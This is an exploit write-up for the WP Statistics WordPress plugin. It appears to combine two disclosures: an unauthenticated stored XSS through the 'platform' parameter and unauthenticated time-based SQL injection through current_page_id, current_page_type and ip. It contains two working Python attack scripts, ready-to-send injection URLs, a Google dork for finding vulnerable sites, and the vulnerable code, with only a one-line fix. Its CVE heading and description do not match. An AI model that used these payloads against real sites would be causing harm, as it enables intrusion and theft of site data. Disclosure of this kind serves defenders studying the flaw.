unauthenticated\_stored\_xss\_platform\_poc.py

import requests, re, json, urllib.parse
from random import randint

wpurl           \=   input('\\nWordPress URL: ')
payload         \=   input('\\nPayload: ')

wp\_session      \=   requests.session()

wp              \=   wp\_session.get(wpurl)
wp\_nonce        \=   re.search(r'\_wpnonce=(.\*?)&wp\_statistics\_hit', wp.text).group(1)

headers         \=   {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12\_2\_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

payload         \=   urllib.parse.quote\_plus(payload)
random\_ip \= '.'.join(\[str(randint(0,255)) for x in range(4)\])
exploit         \=   f'/wp-json/wp-statistics/v2/hit?\_=11&\_wpnonce={wp\_nonce}&wp\_statistics\_hit\_rest=&browser=Chrome&platform={payload}&version=&referred=&ip={random\_ip}&exclusion\_match=no&exclusion\_reason&ua=Something&track\_all=1&timestamp=11&current\_page\_type=home&current\_page\_id=0&search\_query&page\_uri=/&user\_id=0'
exploit\_url     \=   wpurl+exploit

print(f'\\nSending XSS payload: {exploit\_url}')

wp              \=   wp\_session.get(exploit\_url, headers\=headers)
data            \=   wp.json()

print("\\nResponse: \\n" + json.dumps(data, sort\_keys\=True, indent\=4))

print(f'\\nXSS will trigger when admin views platforms of vistors at {wpurl}/wp-admin/admin.php?page=wps\_visitors\_page or other pages')

![image](https://user-images.githubusercontent.com/24238512/154224398-8f449ba5-98a2-4c7c-9854-d11aebbaa5a7.png)

CVE-2022-25307: WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform

The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.

WordPress Plugin WP Statistics >= 13.1.5 - Multiple Unauthenticated SQL Injection vulnerabilities

Exploit Title

WordPress Plugin WP Statistics >= 13.1.5 - Multiple Unauthenticated SQL Injection vulnerabilities

Exploit Author

Muhammad Zeeshan (Xib3rR4dAr)

Date

February 13, 2022

Plugin Link

WP-Statistics

Plugin Active Installations

600,000+

Version

13.1.5 (Latest)

Tested on

Wordpress 5.9

Vulnerable Endpoint

/wp-json/wp-statistics/v2/hit

Vulnerable File

/wp-content/plugins/wp-statistics/includes/class-wp-statistics-pages.php:225

Vulnerable Parameters

current\_page\_id, current\_page\_type

Google Dork

inurl:/wp-content/plugins/wp-statistics

CVE

N/A

**Description**

Endpoint is vulnerable to Unauthenticated SQL Injections when "Cache Compatibility" is enabled in Wp-Statistics settings.

**Vulnerable Endpoint**: /wp-json/wp-statistics/v2/hit

**Vulnerable Parameters**:

*   current\_page\_id
*   current\_page\_type
*   ip

`current_page_id` is Integer based SQL Injection while `current_page_type` is String based SQL Injeciton

**Reproduction Steps**

*   On wordpress installation, install latest version of WP-Statistics which is version 13.1.5 as of writing (February 13, 2022) from Wordpress Plugins Repo.
*   After wordpress login, goto WP Statistics > Settings ie /wp-admin/admin.php?page=wps\_settings\_page and enable "Cache Compatibility"
*   Unauthenticatedly, visit any page of target site and from response page get nonce value for wp-statistics and replace `_wpnonce` in following request:

    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(3)&search_query&page_uri=/&user_id=0
    

*   Make the request and SQL injection will trigger making site respond after 3 seconds.

PoCs for other parameters:

    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(1)&search_query&page_uri=/&user_id=0
    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(1)-'&current_page_id=0&search_query&page_uri=/&user_id=0
    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(1)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0
    

**Vulnerable Code**

wp-statistics/includes/class-wp-statistics-pages.php

225:        $exist = $wpdb\->get\_row("SELECT \`page\_id\` FROM \`" . DB::table('pages') . "\` WHERE \`date\` = '" . TimeZone::getCurrentDate('Y-m-d') . "' " . (array\_key\_exists("search\_query", $current\_page) === true ? "AND \`uri\` = '" . esc\_sql($page\_uri) . "'" : "") . "AND \`type\` = '{$current\_page\['type'\]}' AND \`id\` = {$current\_page\['id'\]}", ARRAY\_A);

wp-statistics/includes/class-wp-statistics-visitor.php

    79:        $visitor = $wpdb->get_row("SELECT * FROM `" . DB::table('visitor') . "` WHERE `last_counter` = '" . ($date === false ? TimeZone::getCurrentDate('Y-m-d') : $date) . "' AND `ip` = '{$ip}'");
    

**Proof of Concept**

import requests, re, json, urllib.parse

wpurl           \=   input('\\nWordPress URL: ')
payload         \=   input('\\nPayload: ')

wp\_session      \=   requests.session()

wp              \=   wp\_session.get(wpurl)
wp\_nonce        \=   re.search(r'\_wpnonce=(.\*?)&wp\_statistics\_hit', wp.text).group(1)

headers         \=   {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12\_2\_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

payload         \=   urllib.parse.quote\_plus(payload)
exploit         \=   f'/wp-json/wp-statistics/v2/hit?\_=11&\_wpnonce={wp\_nonce}&wp\_statistics\_hit\_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion\_match=no&exclusion\_reason&ua=Something&track\_all=1&timestamp=11&current\_page\_type=home&current\_page\_id={payload}&search\_query&page\_uri=/&user\_id=0'
exploit\_url     \=   wpurl+exploit

print(f'\\nSending: {exploit\_url}')

wp              \=   wp\_session.get(exploit\_url, headers\=headers)
data            \=   wp.json()

print("\\nResponse: \\n" + json.dumps(data, sort\_keys\=True, indent\=4))

print(f'\\nTime taken: {wp.elapsed.total\_seconds()}')

![image](https://user-images.githubusercontent.com/24238512/153835470-0e6ae85f-0ed3-4d24-8431-62a9757af1cc.png)

**Fix:**

*   Parameterize user input

Tag

#apple